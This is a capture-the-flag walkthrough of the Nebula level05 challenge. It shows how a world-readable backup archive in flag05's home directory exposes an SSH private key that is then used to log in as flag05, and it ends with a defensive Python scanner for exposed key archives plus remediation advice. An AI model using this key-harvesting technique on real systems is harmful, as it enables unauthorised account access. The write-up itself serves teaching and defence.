Check the flag05 home directory. You are looking for weak directory permissions.


flag05’s home directory is mode drwxr-x--- with group level05, so we can list it as level05. While inspecting it, we can see there’s a .backup directory (drwxr-xr-x) that we have access to.

level05@nebula:~$ ls -al /home/flag05/
total 5
drwxr-x--- 4 flag05 level05   93 2012-08-18 06:56 .
drwxr-xr-x 1 root   root     160 2012-08-27 07:18 ..
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .backup
-rw-r--r-- 1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag05 flag05  3353 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag05 flag05   675 2011-05-18 02:54 .profile
drwx------ 2 flag05 flag05    70 2011-11-20 20:13 .ssh

Inside the .backup directory, someone seems to have saved a tar.gz backup of some files. Let’s see what’s in it!

level05@nebula:~$ ls -al /home/flag05/.backup/
total 2
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .
drwxr-x--- 4 flag05 level05   93 2012-08-18 06:56 ..
-rw-rw-r-- 1 flag05 flag05  1826 2011-11-20 20:13 backup-19072011.tgz

level05@nebula:~$ tar -ztvf /home/flag05/.backup/backup-19072011.tgz
drwxr-xr-x user/user         0 2011-07-19 02:37 .ssh/
-rw-r--r-- user/user       394 2011-07-19 02:37 .ssh/id_rsa.pub
-rw------- user/user      1675 2011-07-19 02:37 .ssh/id_rsa
-rw-r--r-- user/user       394 2011-07-19 02:37 .ssh/authorized_keys

Interesting! That’s a public/private keypair. It’s not a good idea to put files like that in a world-readable file :). Let’s go ahead and extract it to our home directory:

level05@nebula:~$ tar -zxvf /home/flag05/.backup/backup-19072011.tgz
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys

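Knowing that the files were in flag05’s home directory, let’s try using the keys to become flag05. The archive was extracted in our home directory, so the private key is now at ~/.ssh/id_rsa, which ssh offers by default; no extra options are needed.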

level05@nebula:~$ ssh flag05@192.168.1.64
The authenticity of host '192.168.1.64 (192.168.1.64)' can't be established.
ECDSA key fingerprint is ea:8d:09:1d:f1:69:e6:1e:55:c7:ec:e9:76:a1:37:f0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.64' (ECDSA) to the list of known hosts.

[ ... ]

flag05@nebula:~$ getflag
You have successfully executed getflag on a target account
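
To catch this kind of exposure on your own systems, the following added example (not part of the original write-up) walks a directory tree and reports tar archives that are readable by group or other and contain private key material. The function names, the PEM marker list and the choice of /home as the scan root are assumptions of this example.

```python
import os
import stat
import tarfile

# PEM header lines that mark private key material (list chosen for this example).
KEY_MARKERS = (b"-----BEGIN RSA PRIVATE KEY-----",
               b"-----BEGIN OPENSSH PRIVATE KEY-----",
               b"-----BEGIN EC PRIVATE KEY-----",
               b"-----BEGIN DSA PRIVATE KEY-----",
               b"-----BEGIN PRIVATE KEY-----")


def private_key_members(archive_path):
    """Return names of tar members whose content starts with a private key header."""
    hits = []
    with tarfile.open(archive_path, "r:*") as tar:  # "r:*" auto-detects gzip/bz2/xz
        for member in tar:
            if not member.isfile():
                continue
            handle = tar.extractfile(member)
            head = handle.read(64) if handle else b""
            if head.lstrip().startswith(KEY_MARKERS):
                hits.append(member.name)
    return hits


def audit_tree(root):
    """Walk root; return (path, octal mode, key members) for each exposed archive."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
                # Skip anything that is not a regular file readable by group or other.
                if not stat.S_ISREG(st.st_mode) or not st.st_mode & 0o044:
                    continue
                if not tarfile.is_tarfile(path):
                    continue
                members = private_key_members(path)
            except (tarfile.TarError, OSError, EOFError):
                continue  # unreadable or corrupt file: nothing to report
            if members:
                findings.append((path, oct(st.st_mode & 0o777), members))
    return findings


if __name__ == "__main__":
    for path, mode, members in audit_tree("/home"):
        print(f"{path} (mode {mode}) contains private keys: {', '.join(members)}")
```

Any finding means the key should be treated as disclosed: remove it from authorized_keys, generate a new pair, and restrict the backup to mode 0600 or move it out of the home directory.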